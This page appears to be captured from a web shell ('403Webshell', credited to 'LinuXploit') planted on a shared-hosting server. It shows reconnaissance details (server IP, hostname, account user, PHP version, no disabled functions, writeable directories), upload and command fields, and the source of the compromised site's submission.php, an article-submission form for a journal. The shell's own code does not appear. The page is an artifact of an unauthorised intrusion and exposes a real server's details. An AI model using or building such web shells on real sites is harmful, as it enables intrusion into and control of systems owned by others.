403Webshell
Server IP : 192.169.170.185  /  Your IP : 216.73.216.97
Web Server : Apache
System : Linux p3plmcpnl495852.prod.phx3.secureserver.net 4.18.0-553.52.1.lve.el8.x86_64 #1 SMP Wed May 21 15:31:29 UTC 2025 x86_64
User : akhilnew ( 1712764)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/akhilnew/public_html/reflectivejournals.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/akhilnew/public_html/reflectivejournals.com/submission.php
<?php
require_once("header.php");
echo $page_content;

$focus = encrypt('[ARTICLE_SUBMISSION]');
echo <<<EOJ
<noscript>Your browser doesn&rsquo;t support javascript. Please use another browser.</noscript>
<p class="noscript">Your browser doesn&rsquo;t support form script. Please use another browser.</p>
<form action="{$baseurl}submission" method="post" name="articleform" class="form osform ajax-form" enctype="multipart/form-data" onsubmit="return submitform(this)">
	<input type="hidden" name="token" value="{$token}" autocomplete="off" readonly="readonly" />
	<input type="hidden" name="focus" value="{$focus}" autocomplete="off" readonly="readonly" />
	<input type="hidden" name="zipcode" value="" readonly />
	<div class="body">
		<div class="row">
			<div class="fl">
				<label class="flbl">Full Name<span>*</span></label>
				<input type="text" name="name" autocomplete="off" class="field" />
			</div>
			<div class="fr">
				<label class="flbl">Email<span>*</span></label>
				<input type="text" name="email" autocomplete="off" class="field" />
			</div>
		</div>
		<div class="row">
			<label class="flbl">Mobile Number<span>*</span></label>
			<input type="text" name="phone" autocomplete="off" class="field phone" />
		</div>
		<div class="row">
			<label class="flbl">Institute Address<span>*</span></label>
			<textarea rows="5" cols="5" name="address" autocomplete="off" class="field field-textarea"></textarea>
		</div>
		<div class="row">
			<label class="flbl">Title of the submission<span>*</span></label>
			<input type="text" name="title" autocomplete="off" class="field" />
		</div>
		<div class="row">
			<label class="flbl">Abstract<span>*</span></label>
			<textarea rows="5" cols="5" name="abstract" autocomplete="off" class="field field-textarea"></textarea>
		</div>
		<div class="row">
			<label class="flbl">Article File<span>*</span></label>
			<div class="fluid flex">
			<input type="file" name="file[]" multiple="multiple" autocomplete="off" class="field field-file" />
			<input type="button" value="Add More Files" class="button default addfield" />
			</div>
			<div class="fluid morefield"></div>
		</div>
		<div class="row">
			<div class="g-recaptcha" data-sitekey="6Lcvno4UAAAAALOF2Ro10l2PlNZTJ8rRo780VauG"></div>
		</div>
		<div class="row">
			<input type="submit" name="submit" value="submit" disabled="disabled" class="button" />
			<div class="loader">Please Wait...</div>
		</div>
	</div>
</form>
<div class="output"></div>
EOJ;
require_once("footer.php");
?>

Youez - 2016 - github.com/yon3zu
LinuXploit